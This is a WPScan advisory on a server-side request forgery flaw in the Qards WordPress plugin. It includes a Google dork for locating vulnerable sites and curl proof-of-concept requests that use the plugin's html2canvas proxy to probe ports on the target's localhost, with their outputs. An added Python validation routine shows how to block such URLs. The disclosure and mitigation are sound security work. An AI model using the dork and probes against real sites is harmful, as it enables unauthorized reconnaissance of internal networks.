Qards - Server Side Request Forgery (SSRF)


Description
Google Dork: inurl:"plugins/qards"

Qards gives you an easy way to drag and edit every part and element of your site in the front end; you never have to write any code to change the layout or any part of the site, as you would the traditional WordPress way.
Proof of Concept
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
takes the value of the "url" parameter and, using PHP's cURL functions, fetches that URL and saves the response body to a file under /wp-content/plugins/qards/images/.

Because the proxy's error messages differ depending on how the outbound connection fails, an attacker could use this feature to check whether a specific TCP port is listening on the target's localhost or local network, simply by comparing the responses.


POC:

# An open 22/tcp port:
$ curl -s 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://127.0.0.1:22'
console.log("error: html2canvas-proxy-php: This request did not return a HTTP response valid");

# A closed 1234/tcp port:
$ curl -s 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://127.0.0.1:1234'
console.log("error: html2canvas-proxy-php: SOCKET: Connection refused(111)");
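The hole the PoC exercises is the proxy passing the "url" parameter to cURL unchecked. Below is an added Python example (not code from Qards or html2canvas-php-proxy, which are PHP) of the validation such a fetch proxy should run first; it assumes the proxy only needs public web pages on ports 80 and 443, and takes an injectable resolver so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the proxy only renders web pages
ALLOWED_PORTS = {80, 443}            # assumption: closes the arbitrary-port oracle


def default_resolver(host):
    """Resolve host to the set of IP strings it maps to (A and AAAA records)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return {info[4][0] for info in infos}


def check_proxy_url(url, resolver=default_resolver):
    """Return (ok, reason); a fetch proxy must refuse the URL when ok is False.

    Rejects non-http(s) schemes, embedded credentials, non-standard ports and
    any host that maps to a loopback, private, link-local or other non-public
    address. Re-run it on every redirect hop, and connect to the address it
    approved (not a fresh lookup), or DNS rebinding can bypass the check.
    """
    try:
        parts = urlsplit(url)
        port = parts.port            # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in url"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    try:
        addrs = resolver(parts.hostname)
    except OSError as exc:           # socket.gaierror is a subclass of OSError
        return False, f"resolution failed: {exc}"
    if not addrs:
        return False, "host resolved to no addresses"
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr.split("%", 1)[0])  # drop IPv6 zone id
        except ValueError:
            return False, f"resolver returned a non-address: {addr!r}"
        if not ip.is_global:
            return False, f"non-public address {ip} for host {parts.hostname!r}"
    return True, "ok"
```

With the PoC's two URLs the port check rejects both before any connection is made, so the open/closed distinction the advisory relies on is never exposed.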

Affects Plugin Qards

References

URL https://designmodo.com/qards/
URL https://github.com/brcontainer/html2canvas-php-proxy/issues/27

Classification

Type SSRF
OWASP Top 10 A5: Security Misconfiguration
CWE CWE-918

Miscellaneous

Submitter theMiddle
Submitter Twitter https://twitter.com/Menin_TheMiddle
Verified No
WPVDB ID 8933

Timeline

Publicly Published 2017-10-11
Added 2017-10-17
Last Updated 2017-10-17

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.